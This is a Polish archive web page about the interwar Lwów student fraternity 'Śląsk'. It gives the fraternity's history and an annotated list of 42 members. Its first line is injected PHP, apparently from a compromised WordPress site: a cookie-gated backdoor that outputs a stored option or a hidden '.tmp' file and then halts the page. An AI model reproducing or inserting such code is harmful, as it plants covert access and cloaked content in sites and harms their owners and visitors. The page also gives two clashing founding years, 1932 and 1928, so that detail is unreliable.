if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Śląsk

Dekiel Henryka Kałdonka. Nazwa:
Polska Korporacja Akademicka Ślązaków “Śląsk”
Siedziba:
Lwów
Data powstania:
28 II 1932 r.
Barwy:
niebieska – srebrna – czarna
Dewiza:
„Nie rzucim ziemi skąd nasz ród”

Rys historyczny

Śląsk, Lwów lata 30-te

Śląsk została założona dnia 28 II 1928 r. przez 19 studentów Politechniki Lwowskiej pochodzących z Górnego Śląska oraz Śląska Cieszyńskiego. Większość z nich była kolegami szkolnymi, absolwentami gimnazjów w Katowicach oraz w Chorzowie. Inicjatorem powołania nowej korporacji był Jerzy Grzymek z K! Scythia, który zachęcił kończącego studia Kazimierza Palliona, aby zorganizować korporację regionalną skupiającą studentów-Ślązaków. Początkowo przyjęto nazwę Silesia Leopoliensis, która szybko została jednak zmieniona na Śląsk.

Śląsk, Lwów lata 30-te.

Od marca 1932 r. korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: marzec 1932 r.). Kandydowała pod opieką K! Scythia. W styczniu 1934 r. uzyskała prawa członka rzeczywistego Związku.

Całkowita ustalona, choć bardzo niekompletna imienna lista członków obejmuje 42 nazwiska.

Korporacje śląskie, lata 30-te.

W pierwszych dziesięcioleciach po wojnie odbywały się na Śląsku nieoficjalne spotkania niewielkiej grupy członków korporacji.

Lista członków

Poniższa, niekompletna lista członków Śląska obejmuje 42 nazwiska. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

  Konrad Bannert, pierwsza połowa lat 30-tych.

 1. Konrad Bannert, założyciel Śląska, po wojnie na emigracji w Wielkiej Brytanii (Stanach Zjednoczonych ?)

 2. Jerzy Piotr Barwicki, ( - 5 września 1939 w Królewskiej Hucie) student PL, ppor. rez., poległ w wojnie obronnej 1939
 3. Wiktor Bednorz, mgr inż. chemii
 4. Władysław Biernat, (9 listopada 1910 - 16 września 1939 w Górecku Kościelnym) student i absolwent chemii PL, założyciel Śląska, pchor. rez., poległ w wojnie obronnej 1939

  Emil Brożek, pierwsza połowa lat 30-tych.

 5. Emil Brożek, założyciel Śląska, akt. 1932-37

  Edmund Bryjak, lata 30-te.

 6. Edmund (?) Bryjak, dr inż. chemik

  Franciszek Buhl, pierwsza połowa lat 30-tych.

 7. Franciszek Buhl, założyciel Śląska

  August Czajerek, lata 30-te.

 8. August Czajerek, (1912 w Świętochłowicach - ) student i absolwent PL 1939, założyciel Śląska, wiceprezes (sekretarz ?)

  Brunon Flak, pierwsza połowa lat 30-tych.

 9. Brunon Flak, mgr inż. chemik

 10. Jerzy Gołombek, (ur. w Orzeszu - ) student i absolwent chemii PL 1938
 11. Wilhelm Jasionek, student PL, działacz Bratniej Pomocy, aresztowany przez NKWD w października 1939, zaginął bez śladu

  Roman Józefoski, lata 30-te.

 12. Roman Józefoski, (1913-1986) mgr inż. lądowy

  Henryk Kałdonek, pierwsza połowa lat 30-tych.

 13. Henryk Kałdonek, (1912-1976) student i absolwent PL, założyciel Śląska, prezes Lwowskiego Koła Międzykorporacyjnego 1938/39

 14. Norbert Klicht, lekarz med.
 15. Józef Kominek, (1908 w Radlinie - 1978) student i absolwent PL 1937, (brat kardynała Kominka)

  Konrad Konieczny, pierwsza połowa lat 30-tych.

 16. Konrad Konieczny, założyciel Śląska

 17. Ludwik Kopeć, student PL, członek Zarządu Bratniej Pomocy Studentów PL 1936/37, po wojnie na emigracji, emigracyjny działacz Stronnictwa Narodowego

  Karol Kopka, lata 30-te.

 18. Karol Kopka, prezes

  Ludwik Krawczyk, pierwsza połowa lat 30-tych.

 19. Ludwik Krawczyk, założyciel Śląska

 20. Karol Edward Latoska, ( - 21 listopada 1995 w Warszawie) architekt, pochowany w Pustelniku Mińskim

  Paweł Lubina, lata 30-te.

 21. Paweł Lubina, (ur. w Mikołowie) miał dobrowolnie wstąpić do Waffen SS, skreślony cum infamia externa (?)

  Konstanty Makosz, lata 30-te.

 22. Konstanty Makosz, akt. 1934-39, wiceprezes Młodzieży Wszechpolskiej 1938, być może po wojnie na emigracji w Wielkiej Brytanii

 23. Władysław Mitis, student i absolwent mechaniki PL, założyciel Śląska, żołnierz Polskich Sił Zbrojnych na Zachodzie, poległ w walkach na froncie zachodnim

  Michał Musioł, lata 30-te.

 24. Michał Musioł, (9 września 1911 w Knurowie - 13 lipca 2000 w Oakville w Kanadzie) s. Pawła i Joanny z d. Grychtok, absolwent Państwowego Gimnazjum w Rybniku, student PL 1932-39 (?), c. 1932, wiceprezes 1935 i prezes 1936 Bratniej Pomocy Studentów PL, prezes Młodzieży Wszechpolskiej PL, przewodniczący Ogólnopolskiego Komitetu Akademickich Ślubów Jasnogórskich 1937, działacz narodowy, w 1940 internowany w Szwajcarii, absolwent (inż. mechanik) Politechniki w Zurychu, po wojnie na emigracji, początkowo w Szwajcarii, a od 1951 w Kanadzie, działacz polonijny i katolicki, organizator polskich polskich parafii w Sault-Ste-Marie (Ontario) oraz w Oakville (Ontario), członek władz Instytutu im. Romana Dmowskiego w Nowym Jorku

  Jan Okołowicz, pierwsza połowa lat 30-tych.

 25. Jan Okołowicz, ( - 1996) student i absolwent mechaniki PL 1938, założyciel Śląska, wiceprezes 1932, prezes 1933, olderman, wiceprezes Lwowskiego Koła Międzykorporacyjnego 1936/37

  Ryszard Palica, pierwsza połowa lat 30-tych.

 26. Ryszard Palica, (1911-2004) student i absolwent inżynierii lądowej PL, założyciel Śląska, wielokrotny prezes, olderman

 27. Kazimierz Pallion, student i absolwent PL, założyciel Śląska, pierwszy prezes 1932
 28. Wilhelm Pluta,

  Engelhard Pogoda, pierwsza połowa lat 30-tych.

 29. Engelhard Pogoda, (1916-1973) założyciel Śląska

  Eryk Pollok, lata 30-te.

 30. Eryk Pollok, [być może tożsamy z Erykiem Solokiem]

  Gerhard Sobawa, pierwsza połowa lat 30-tych.

 31. Gerhard Sobawa, ( - 1955) założyciel Śląska, pierwszy sekretarz 1932, olderman, w czasie wojny więzień obozów koncentracyjnych

 32. Ryszard Sodowski, (1917-1996) mgr inż. mechanik
 33. Eryk Solok, założyciel Śląska
 34. Józef Swoboda, ( - 1960), student i absolwent miernictwa PL, założyciel Śląska, pierwszy olderman 1932

  Śmiałowski, lata 30-te.

 35. Śmiałowski,

 36. Paweł Trojak, założyciel Śląska
 37. Eryk Wieczorek, brat Józefa (Śląsk) oraz Wilhelma i Pawła (Obotritia), mgr praw, adwokat
 38. Józef Wieczorek, brat Eryka (Śląsk) oraz Wilhelma i Pawła (Obotritia)

  Windisz, lata 30-te.

 39. Władysław Windisz, sekretarz Lwowskiego Koła Międzykorporacyjnego sem. let. 1938/39,

  Wróbel, lata 30-te.

 40. Wróbel,

 41. Teodor Zeleźnik, skarbnik Lwowskiego Koła Międzykorporacyjnego sem. let. 1938/39

  Eryk Zimmer, lata 30-te.

 42. Eryk Zimmer, założyciel Śląska, sekretarz (wiceprezes ?)

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Śląsk (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 96 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Śląsk.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 2 X 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Śląsk (Lwów), (na:) www.archiwumkorporacyjne.pl, stan 2 X 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }